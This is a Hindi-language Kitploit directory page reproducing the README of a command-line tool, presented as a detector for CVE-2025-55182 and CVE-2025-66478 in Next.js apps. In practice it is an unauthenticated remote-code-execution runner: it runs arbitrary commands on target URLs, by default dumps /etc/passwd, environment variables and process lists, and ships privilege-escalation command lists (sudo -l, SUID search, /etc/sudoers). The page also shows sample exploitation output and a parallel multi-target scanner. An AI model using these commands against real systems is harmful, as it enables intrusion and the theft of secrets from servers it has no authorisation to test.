Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — CVE-2025-55182 और CVE-2025-66478 का पता लगाने के लिए एक कमांड-लाइन टूल, जो React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों में कार्य करता है। | Kitploit
उपकरण/GitHubGitHub/rix4uni/cve-2025-55182
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubrix4uni/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 और CVE-2025-66478 का पता लगाने के लिए एक कमांड-लाइन टूल, जो React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों में कार्य करता है।

रिपॉजिटरी देखें
61114 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182

React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों में CVE-2025-55182 और CVE-2025-66478 का पता लगाने के लिए एक कमांड-लाइन टूल।

🚀 स्थापना

wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator

🛠️ उपयोग

CVE-2025-55182 स्कैनर

मूल वाक्यविन्यास

CVE-2025-55182 -d https://example.com

विकल्प

विकल्पविवरणडिफ़ॉल्ट
-d, --domainलक्ष्य URL (यदि कोई प्रोटोकॉल नहीं है तो स्वचालित रूप से https:// जोड़ता है)http://localhost:3000
-c, --commandनिष्पादित करने के लिए एकल कमांड-
-m, --multipleअर्धविराम द्वारा अलग किए गए एकाधिक कमांड-
-f, --fileकमांड वाली फ़ाइल (प्रति पंक्ति एक)-
-h, --helpसहायता संदेश दिखाएं-

नोट: यदि कोई कमांड विकल्प प्रदान नहीं किया गया है, तो डिफ़ॉल्ट कमांड निष्पादित होते हैं।

डिफ़ॉल्ट कमांड

टूल डिफ़ॉल्ट रूप से ये कमांड निष्पादित करता है:

  1. cat /etc/os-release - OS जानकारी
  2. whoami - वर्तमान उपयोगकर्ता
  3. pwd - वर्तमान कार्यशील निर्देशिका
  4. id - उपयोगकर्ता ID और समूह
  5. uname -a - सिस्टम जानकारी
  6. hostname -I - नेटवर्क इंटरफ़ेस
  7. ls -la - निर्देशिका सूची
  8. cat /etc/passwd - उपयोगकर्ता खाते
  9. env - पर्यावरण चर
  10. ps aux - चल रही प्रक्रियाएँ

रिपोर्ट जनरेटर

reportgenerator टूल स्कैन परिणामों से स्वचालित रूप से पेशेवर भेद्यता प्रकटीकरण रिपोर्ट तैयार करता है।

विशेषताएँ

  • एकाधिक लक्ष्यों का समानांतर स्कैनिंग
  • स्वचालित संख्यांकन जो मौजूदा रिपोर्टों को संरक्षित करता है (कोई ओवरराइट नहीं)
  • पेशेवर मार्कडाउन रिपोर्ट जिसमें सुरक्षा भेद्यता प्रकटीकरण अनुभाग शामिल है
  • अनुकूलन योग्य शोधकर्ता नाम और इनपुट फ़ाइल

मूल उपयोग

# लक्ष्य डोमेन के साथ एक फ़ाइल बनाएँ
echo -e "https://target1.com\nhttps://target2.com" > subs.txt

# रिपोर्ट जनरेटर चलाएँ
reportgenerator

विकल्प

फ़्लैगविवरणडिफ़ॉल्ट
--fileलक्ष्य डोमेन वाली इनपुट फ़ाइलsubs.txt
--userप्रकटीकरण अनुभाग के लिए शोधकर्ता का नामBhagirath Saxena

उदाहरण

# डिफ़ॉल्ट सेटिंग्स का उपयोग करें (subs.txt, Bhagirath Saxena)
reportgenerator

# कस्टम लक्ष्य फ़ाइल का उपयोग करें
reportgenerator --file targets.txt

# कस्टम शोधकर्ता नाम का उपयोग करें
reportgenerator --user "John Doe"

# दोनों कस्टम विकल्पों का उपयोग करें
reportgenerator --file my-targets.txt --user "Jane Smith"

आउटपुट संरचना

रिपोर्ट दो निर्देशिकाओं में उत्पन्न होती हैं:

  • textfile/ - कच्चा स्कैन आउटपुट (संख्या: 1.txt, 2.txt, आदि)
  • mdfile/ - पेशेवर मार्कडाउन रिपोर्ट (संख्या: 1.md, 2.md, आदि)

नोट: स्वचालित संख्यांकन सुविधा यह सुनिश्चित करती है कि मौजूदा रिपोर्ट कभी ओवरराइट न हों। नए स्कैन सबसे बड़ी मौजूदा संख्या से जारी रहते हैं।

रिपोर्ट प्रारूप

प्रत्येक उत्पन्न रिपोर्ट में शामिल है:

  1. सुरक्षा भेद्यता प्रकटीकरण - पेशेवर परिचय पत्र
  2. लक्ष्य - परीक्षण किया गया डोमेन
  3. निष्पादित कमांड - परीक्षण के दौरान चलाए गए कमांड की सूची
  4. भेद्यता सारांश - CVE विवरण और प्रभाव मूल्यांकन
  5. शोषण विवरण - निष्पादन स्थिति के साथ कमांड आउटपुट
  6. निष्पादन सारांश - प्रत्येक कमांड की सफलता/विफलता दर्शाने वाली तालिका
  7. प्रभाव विश्लेषण - गंभीरता मूल्यांकन और अवलोकन
  8. सिफारिशें - सुरक्षा टीम के लिए उपचारात्मक कदम
  9. संदर्भ - CVE विवरण और सुरक्षा सलाहकारों के लिंक

🎨 आउटपुट उदाहरण

सफल शोषण

▼ 🎯 TARGET: https://vulnerable-app.com
▼ 📋 COMMANDS TO RUN: 10
  • cat /etc/os-release
  • whoami
  • pwd
  • id
  • uname -a
  • hostname -I
  • ls -la
  • cat /etc/passwd
  • env
  • ps aux

[1/10] Executing: cat /etc/os-release
▼ 💻 OS INFORMATION
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...

[2/10] Executing: whoami
▼ 👤 CURRENT USER
║ www-data
...

[3/10] Executing: pwd
▼ 📂 CURRENT DIRECTORY
║ /var/www/html
...

आंशिक सफलता

[6/10] Executing: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Command failed: hostname -I
║ This command might not be available or the server rejected it
╚════════════════════════════════════════════════════════════╝

[!] Trying alternative network command...
▼ 🌐 NETWORK INTERFACES (alternative)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║     inet 127.0.0.1/8 scope host lo
║        valid_lft forever preferred_lft forever
...

🔧 तकनीकी विवरण

भेद्यता

  • CVE: CVE-2025-55182
  • प्रकार: प्रोटोटाइप प्रदूषण → RCE
  • प्रभावित: विशिष्ट कॉन्फ़िगरेशन वाले Next.js अनुप्रयोग
  • वेक्टर: क्राफ्टेड multipart/form-data के साथ HTTP POST
  • प्रभाव: अनुप्रयोग उपयोगकर्ता के रूप में अनप्रमाणित दूरस्थ कोड निष्पादन

📚 संदर्भ

  • CVE-2025-55182 विवरण
  • Next.js सुरक्षा सलाहकार

commands/ निर्देशिका उदाहरण:

विभिन्न परिदृश्यों के लिए नमूना कमांड फ़ाइलें बनाएँ:

# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
टूल डाउनलोड करें